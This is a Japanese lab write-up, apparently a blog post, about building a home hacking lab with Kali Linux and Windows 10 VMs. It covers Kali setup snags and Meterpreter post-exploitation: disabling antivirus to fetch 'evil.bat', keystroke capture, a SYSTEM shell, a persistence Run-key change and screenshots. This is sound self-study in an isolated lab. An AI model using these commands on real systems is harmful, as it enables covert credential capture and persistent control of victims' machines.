#目次
1、はじめに
2、環境
3、構築で詰まったこと
4、実施したこと
5、おわりに
6、参考資料
#1、はじめに
ハッキング・ラボのつくりかたを行いました。
構築/学習で行ったことや詰まったところを紹介します。
詳細は、書籍をご参照ください。
#2、環境
ホストOS:Windows10 Home
VirtualBox:6.0.16
ゲストOS(Linux):Kali Linux(2020.1) VirtulBox 64-bit版
ゲストOS(Windows):Windows10(May 2020 Update)
#3、構築
構築については、実施手順を紹介すると長くなるため、詰まったところを紹介します。
下記の②~④に関しては、できていなくても実施に問題ないため、詰まったら飛ばしていいかもしれません。
###①ログイン時
Kali Linux(2020.1)ではrootにパスワードが設定されていないため、ログインできません。
kali/kaliでログイン可能です。
###②Linuxの設定について
Settings画面が異なるため、詰まりやすいです。
左上のKaliマークから検索します。
・画面設定→「Display」
・電源設定→「Xfce Power Manager」
・キーボード→「Keyboard」
###③タイムゾーンについて
別で設定します。
右上の時刻「HH:SS PM」をクリック→「Properties」→「Clock」
→「Timezone」に「Asia/Tokyo」を入力
###④日本語入力について
パッケージインストール前に「apt update」「apt upgrade」の実施が必要です。
また、インストール後に適用が必要です。
「sudo dpkg-reconfigure locales」→「ja_JP.UTF-8」の場所でスペースキーを押す
→「*」がつく→Enterキー「ja_JP.UTF-8」を選択してEnterキー→再起動
###⑤IPアドレスを確認する際
ifconfigを使用できません。
「ip addr show」を使用します。
ルーティング確認時は、「ip route show」で行います。
#4、実施したこと
まず、Windows10に侵入する。
ゲストのWindowsにて、リアルタイムスキャンを使用していると、「evil.bat」を入手できないため、停止しておく。
###①キーロガー取得
Linux側でキースキャンをスタートします。
meterpreter > keyscan_start
Starting the keystroke sniffer ...
Windows側で下記のように入力します。
password
pcuser 1234
Linux側でdumpします。
下記のような形で結果が出ます。
meterpreter > keyscan_dump
Dumping captured keystrokes...
password<CR>
<CR>
pcuser 1234<^S>
meterpreter >
###②コマンドプロンプト操作
以下のコマンドからコマンドプロンプトに入ります。
meterpreter > shell
システム権限でコマンドプロンプトに入れば、何でもできます。
例えば、Webサイトや動画の再生を行うならば、以下のコマンドです。
C:\Windows\system32>start https://xxx.xxx.xxx/
C:\Windows\system32>start xxx.mp4
###③レジストリの変更
Windowsのログイン時にInternetExplorerを起動するように設定します。
「HKLM\software\microsoft\windows\currentversion\run」に「explorer.exe」を設定します。
まず、値を確認します。
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (1):
SecurityHealth
meterpreter >
値を変更します。
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v explorer -d 'C:\Windows\explorer.exe'
Successfully set explorer of REG_SZ.
meterpreter >
値を確認して、「explorer.exe」が追加されていることを確認します。
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (2):
SecurityHealth
explorer
meterpreter >
###④スクリーンショット
以下のコマンドからWindowsのスクリーンショットを取得できます。
meterpreter > screenshot
#5、おわりに
Meterpreterを中心に学習を行ったため、後半のLANやWebアプリ経由のハッキングを試してみたいです。
また、他のソフトウェアを使用したハッキングも試そうと思います。
#6、参考資料
ハッキング・ラボのつくりかた(こちらはメイン資料です。)
実践 Metasploit(Meterpreterに関して詳しい。)